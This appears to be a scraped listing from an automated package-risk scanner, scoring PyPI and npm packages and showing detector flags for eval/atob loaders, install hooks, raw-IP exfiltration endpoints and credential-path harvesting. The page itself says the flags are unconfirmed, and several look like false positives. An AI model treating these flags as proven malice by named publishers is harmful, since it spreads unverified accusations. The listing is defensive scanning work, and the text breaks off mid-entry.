  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_hf_to_gguf.py:28
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_llama_ggml_to_gguf.py:14
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_lora_to_gguf.py:22
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_server_py_core-0.1.4/llama.cpp/ggml/src/ggml-kompute/kompute/scripts/convert_shaders.py:100
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_server_py_core-0.1.4/llama.cpp/ggml/src/ggml-kompute/kompute/setup.py:25
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_hf_to_gguf.py:28
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_llama_ggml_to_gguf.py:14
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/convert_lora_to_gguf.py:22
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_server_py_core-0.1.4/llama.cpp/ggml/src/ggml-kompute/kompute/scripts/convert_shaders.py:100
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_server_py_core-0.1.4/llama.cpp/ggml/src/ggml-kompute/kompute/setup.py:25
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/ggml/src/ggml-kompute/kompute/setup.py:56
  • SUSPICIOUS_OBFUSCATION: 'Dense Hex Escape Sequences' found in llama_cpp_server_py_core-0.1.4/llama.cpp/gguf-py/gguf/quants.py:660
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_server_py_core-0.1.4/llama.cpp/gguf-py/gguf/scripts/gguf_convert_endian.py:14

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
180 88d 0 2,675 ↑0.0/day
Very Risky
skillwatch pypi 0.4.1 Kuziva Muzondo — 🪝
Package purpose: Monitor external URLs referenced by AI agent skills and MCP tools for bait-and-switch content changes
Claimed homepage: https://pypi.org/project/skillwatch/
Matched naming pattern: python-skillwatch-core
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 88
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 2675 lines, 143.2 kB across 13 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (72 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in skillwatch-0.4.1/skillwatch/anchoring.py:194
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in skillwatch-0.4.1/skillwatch/detector.py:93
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'atob()' found in skillwatch-0.4.1/skillwatch/detector.py:94
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in skillwatch-0.4.1/skillwatch/detector.py:93
  • CRITICALSOURCE_CODE_DYNAMIC_CODE_LOADER: execution primitive combined with decode/network/obfuscation call in skillwatch-0.4.1/skillwatch/detector.py
  • INFOSubstantial functional codebase (2675 LOC across 13 file(s)).
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in skillwatch-0.4.1/skillwatch/anchoring.py:194
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in skillwatch-0.4.1/skillwatch/detector.py:93
  • SOURCE_CODE_ENCODED_PAYLOAD: 'atob()' found in skillwatch-0.4.1/skillwatch/detector.py:94
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in skillwatch-0.4.1/skillwatch/detector.py:93
  • SOURCE_CODE_DYNAMIC_CODE_LOADER: execution primitive combined with decode/network/obfuscation call in skillwatch-0.4.1/skillwatch/detector.py

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
180 298d 26 857 ↑0.1/day
Very Risky
llama pypi 0.2.0 — oloruntoba.madamori@totogi.com totogi.com 🪝 ⚡ 📦
Package purpose: MCP server for document parsing with LlamaCloud multimodal understanding
Claimed homepage: https://pypi.org/project/llama-mcp-server/
Matched naming pattern: llama-llama-server
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 298
Registry downloads: 26/month, 5/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 857 lines, 40.1 kB across 5 files (MODERATE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('LLAMA').
  • HIGHPublisher email 'oloruntoba.madamori@totogi.com' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 270 days ago within the 1-year AI tool proliferation window.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_mcp_server-0.2.0/test.py:5
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_mcp_server-0.2.0/llamacloud_mcp/main.py:172
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in llama_mcp_server-0.2.0/venv/Lib/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
  • HIGHPYTHON_PTH_STARTUP_HOOK: Startup .pth file declared in package: llama_mcp_server-0.2.0/venv/Lib/site-packages/pywin32.pth
  • HIGHBUNDLED_NATIVE_BINARY: Unexpected compiled binary 'llama_mcp_server-0.2.0/venv/Scripts/docutils.exe' in package archive
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_mcp_server-0.2.0/test.py:5
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_mcp_server-0.2.0/llamacloud_mcp/main.py:172
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in llama_mcp_server-0.2.0/venv/Lib/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
  • PYTHON_PTH_STARTUP_HOOK: Startup .pth file declared in package: llama_mcp_server-0.2.0/venv/Lib/site-packages/pywin32.pth
  • BUNDLED_NATIVE_BINARY: Unexpected compiled binary 'llama_mcp_server-0.2.0/venv/Scripts/docutils.exe' in package archive
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_mcp_server-0.2.0/venv/Scripts/pywin32_testall.py:25

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
175 224d 37 135 ↑0.2/day
Very Risky
kraken pypi 0.7.0 — darkglasses1122@gmail.com gmail.com 🪝 ⚡
Package purpose: SkelForm runtime for Kraken Engine
Claimed homepage: https://pypi.org/project/skelform-kraken/
Matched naming pattern: python-kraken-skelform
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 224
Registry downloads: 37/month, 8/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 135 lines, 6.2 kB across 1 file (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'skelform-kraken' matches AI hallucination template [python] + [kraken] + [skelform].
  • HIGHClaims critical enterprise brand identity ('KRAKEN').
  • HIGHPublisher email 'darkglasses1122@gmail.com' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 197 days ago within the 1-year AI tool proliferation window.
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in skelform_kraken-0.7.0/venv/lib/python3.14/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in skelform_kraken-0.7.0/venv/lib/python3.14/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
175 712d 5 537 ↑0.0/day
Very Risky
sol pypi 0.0.3 — smbd0x@rambler.ru rambler.ru 🪝 ⚡ 📦
Package purpose: This library contains a set of functions for interacting with Solana blockchain, as well as some third-party APIs such as Jupiter, DexScreener, etc.
Claimed homepage: https://pypi.org/project/ultimate-sol/
Matched naming pattern: python-sol-ultimate
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 712
Registry downloads: 5/month, 3/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 537 lines, 22.1 kB across 7 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'ultimate-sol' matches AI hallucination template [python] + [sol] + [ultimate].
  • HIGHClaims critical enterprise brand identity ('SOL').
  • HIGHPublisher email 'smbd0x@rambler.ru' is not affiliated with official vendor domain.
  • HIGHPYTHON_PTH_STARTUP_HOOK: Startup .pth file declared in package: ultimate_sol-0.0.3/venv/Lib/site-packages/_virtualenv.pth
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in ultimate_sol-0.0.3/venv/Lib/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ultimate_sol-0.0.3/venv/Scripts/activate_this.py:24
  • HIGHBUNDLED_NATIVE_BINARY: Unexpected compiled binary 'ultimate_sol-0.0.3/venv/Scripts/base58.exe' in package archive
  • INFOSubstantial functional codebase (537 LOC across 7 file(s)).
Static code signals:
  • PYTHON_PTH_STARTUP_HOOK: Startup .pth file declared in package: ultimate_sol-0.0.3/venv/Lib/site-packages/_virtualenv.pth
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in ultimate_sol-0.0.3/venv/Lib/site-packages/distutils-precedence.pth: 'import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__(''
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ultimate_sol-0.0.3/venv/Scripts/activate_this.py:24
  • BUNDLED_NATIVE_BINARY: Unexpected compiled binary 'ultimate_sol-0.0.3/venv/Scripts/base58.exe' in package archive

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
175 725d 85 343 ↑0.1/day
Very Risky
web3 npm 0.2.0 — — 🪝 📡
Package purpose: Web3 integration providing Software Development Kit (SDK) for Web3
Matched naming pattern: web3-web3-sdk
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 725
Code-only verdict: Unverified Signal (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 85/month, 21/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 343 lines, 11.7 kB across 3 files (MODERATE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('WEB3').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'openapi'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in package/dist/index.js:79
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/index.js:90
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'openapi'
  • MISSING_SOURCE_REPOSITORY_URL
  • EXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in package/dist/index.js:79
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/index.js:90

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
170 10d 771 6,866 ↑77.1/day
Very Risky
poppy pypi 0.5.1 dbmrq — 🪝
Package purpose: Turn coding-agent session history into reviewed skills, memories, and rules.
Claimed homepage: https://pypi.org/project/poppy-ai/
Matched naming pattern: python-poppy-ai
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 10
Registry downloads: 771/month, 47/week (MODERATE_USAGE)
Codebase size: 6866 lines, 295.5 kB across 27 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (10 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in poppy_ai-0.5.1/src/poppy/agent.py:102
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in poppy_ai-0.5.1/src/poppy/agent.py:92
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in poppy_ai-0.5.1/src/poppy/demo.py:462
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in poppy_ai-0.5.1/src/poppy/library.py:347
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in poppy_ai-0.5.1/src/poppy/mailer.py:53
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in poppy_ai-0.5.1/src/poppy/schedule.py:132
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in poppy_ai-0.5.1/src/poppy/agent.py:102
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in poppy_ai-0.5.1/src/poppy/agent.py:92
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in poppy_ai-0.5.1/src/poppy/demo.py:462
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in poppy_ai-0.5.1/src/poppy/library.py:347
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in poppy_ai-0.5.1/src/poppy/mailer.py:53
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in poppy_ai-0.5.1/src/poppy/schedule.py:132
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in poppy_ai-0.5.1/src/poppy/schedule.py:186
  • SYSTEM_PERSISTENCE_TAMPERING: 'Cron Job Installation / Tampering' found in poppy_ai-0.5.1/src/poppy/schedule.py:389

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
165 76d 73 26,770 ↑1.0/day
🐛 Potential Cross-Ecosystem Worm Very Risky
enginery pypi 0.5.0 Mathews-Tom — 🪝 🐛
Package purpose: Engineer the system that engineers software.
Claimed homepage: https://pypi.org/project/enginery/
Matched naming pattern: python-enginery-core
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 76
Registry downloads: 73/month, 8/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 26770 lines, 1.2 MB across 157 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (52 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in enginery-0.5.0/scripts/adversarial_capability_gate.py:67
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/check_docs_currency.py:101
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/fault_inject_ledger.py:149
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/fault_inject_workers.py:59
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/full_system_gate.py:997
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in enginery-0.5.0/scripts/full_system_gate.py:265
Static code signals:
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in enginery-0.5.0/scripts/adversarial_capability_gate.py:67
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/check_docs_currency.py:101
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/fault_inject_ledger.py:149
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/fault_inject_workers.py:59
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/full_system_gate.py:997
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in enginery-0.5.0/scripts/full_system_gate.py:265
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/release_consumer_smoke.py:18
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/release_gate.py:96

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
165 253d 276 101,045 ↑1.1/day
Very Risky
claude npm 2.10.2 Jurgen Calleja — 🪝 🗄️
Package purpose: TLC - Test Led Coding for Claude Code
Claimed homepage: https://github.com/jurgencalleja/TLC#readme
Matched naming pattern: tlc-claude-code
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 253
Registry downloads: 276/month, 69/week (MODERATE_USAGE)
Codebase size: 101045 lines, 3.7 MB across 702 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'tlc-claude-code' matches AI hallucination template [tlc] + [claude] + [code].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • MEDIUMPackage registered 225 days ago within the 1-year AI tool proliferation window.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node bin/postinstall.js'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in package/server/lib/access-control.js:320 (+2 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/server/lib/agent-persistence.js:28 (+31 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/server/lib/api-provider.js:45 (+22 more occurrence(s) elsewhere)
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'node bin/postinstall.js'
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in package/server/lib/access-control.js:320 (+2 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/server/lib/agent-persistence.js:28 (+31 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/server/lib/api-provider.js:45 (+22 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/server/lib/audit-attribution.js:5 (+26 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/server/lib/audit-attribution.js:18 (+15 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/server/lib/security/auth-security.js:91 (+5 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/server/lib/security/compose-templates.js:53 (+4 more occurrence(s) elsewhere)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
165 285d 39 186,936 ↑0.1/day
Very Risky
claude npm 2.1.36 — — 🪝 🗄️
Package purpose: Open source AI coding platform with 37+ tools, Web IDE, multi-agent system, and MCP protocol support
Claimed homepage: https://github.com/kill136/claude-code-open#readme
Matched naming pattern: claude-claude-open
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 285
Registry downloads: 39/month, 9/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 186936 lines, 7.1 MB across 884 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • MEDIUMPackage registered 268 days ago within the 1-year AI tool proliferation window.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node scripts/postinstall.js || true'
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/tools/agent.js:429 (+131 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/web/server/routes/ai-editor.js:1626 (+41 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/mcp/auto-discovery.js:141 (+22 more occurrence(s) elsewhere)
  • HIGHCREDENTIAL_PATH_HARVESTING: 'Shell Command History (~/.bash_history, ~/.zsh_history)' found in package/dist/tools/bash-history.js:35 (+3 more occurrence(s) elsewhere)
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'node scripts/postinstall.js || true'
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/tools/agent.js:429 (+131 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/web/server/routes/ai-editor.js:1626 (+41 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/mcp/auto-discovery.js:141 (+22 more occurrence(s) elsewhere)
  • CREDENTIAL_PATH_HARVESTING: 'Shell Command History (~/.bash_history, ~/.zsh_history)' found in package/dist/tools/bash-history.js:35 (+3 more occurrence(s) elsewhere)
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in package/dist/tools/bash.js:682 (+21 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/dist/blueprint/browser-test-tools.js:478 (+5 more occurrence(s) elsewhere)
  • CREDENTIAL_PATH_HARVESTING: 'System Credentials (/etc/shadow, /etc/passwd)' found in package/dist/sandbox/bubblewrap.js:300 (+3 more occurrence(s) elsewhere)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
162 63d 585 6,430 ↑9.3/day
Very Risky
claude npm 2.46.0 open-claude-code — 🪝 🌐 📡 🗄️
Package purpose: Community edition of the Anthropic Claude Code CLI — a reverse-engineered restoration with community optimizations; interactive AI coding assistant in the terminal
Claimed homepage: https://github.com/sweetcornna/open-claude-code#readme
Matched naming pattern: node-claude-open-claude-code
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 63
Registry downloads: 585/month, 146/week (MODERATE_USAGE)
Codebase size: 6430 lines, 8.5 MB across 670 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name '@sweetcornna/open-claude-code' matches AI hallucination template [node] + [claude] + [open-claude-code].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (51 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node scripts/postinstall.cjs'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/scripts/postinstall.cjs:23
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/scripts/postinstall.cjs:146 (+4 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/scripts/postinstall.cjs:174 (+11 more occurrence(s) elsewhere)
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'node scripts/postinstall.cjs'
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/scripts/postinstall.cjs:23
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/scripts/postinstall.cjs:146 (+4 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/scripts/postinstall.cjs:174 (+11 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/scripts/postinstall.cjs:42 (+129 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENCODED_PAYLOAD: 'atob()' found in package/dist/chunks/auth-uXIJcoGG.js:1 (+4 more occurrence(s) elsewhere)
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in package/dist/chunks/claudeDesktop-Cdvs6bq6.js:1 (+1 more occurrence(s) elsewhere)
  • CREDENTIAL_PATH_HARVESTING: 'Cloud Instance Metadata (AWS/GCP/Azure IMDS)' found in package/dist/chunks/dist-es-BojmTNsk2.js:1 (+2 more occurrence(s) elsewhere)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
160 210d 11 727 ↑0.1/day
Very Risky
langchain pypi 0.1.0 — sophia.eagent@gmail.com gmail.com 🪝 📡
Package purpose: LangChain + CrewAI tools for RustChain blockchain and BoTTube video platform
Claimed homepage: https://pypi.org/project/rustchain-langchain/
Matched naming pattern: python-langchain-rustchain
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 210
Code-only verdict: Unverified Signal (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 11/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 727 lines, 32.6 kB across 5 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'rustchain-langchain' matches AI hallucination template [python] + [langchain] + [rustchain].
  • HIGHClaims critical enterprise brand identity ('LANGCHAIN').
  • HIGHPublisher email 'sophia.eagent@gmail.com' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 199 days ago within the 1-year AI tool proliferation window.
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in rustchain_langchain-0.1.0/evangelist_agent.py:31
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in rustchain_langchain-0.1.0/evangelist_agent.py:30
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in rustchain_langchain-0.1.0/rustchain_langchain/tools.py:31
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in rustchain_langchain-0.1.0/rustchain_langchain/tools.py:31
Static code signals:
  • EXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in rustchain_langchain-0.1.0/evangelist_agent.py:31
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in rustchain_langchain-0.1.0/evangelist_agent.py:30
  • EXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in rustchain_langchain-0.1.0/rustchain_langchain/tools.py:31
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in rustchain_langchain-0.1.0/rustchain_langchain/tools.py:31
  • EXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in rustchain_langchain-0.1.0/rustchain_mcp/server.py:28
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in rustchain_langchain-0.1.0/rustchain_mcp/server.py:27

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
160 267d 12 7,610 ↑0.0/day
Very Risky
claude pypi 0.1.5 — — 🪝
Package purpose: TUI manager for Claude Code sessions - browse, search, and teleport across time
Claimed homepage: https://pypi.org/project/one_claude/
Matched naming pattern: python-claude-one
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 267
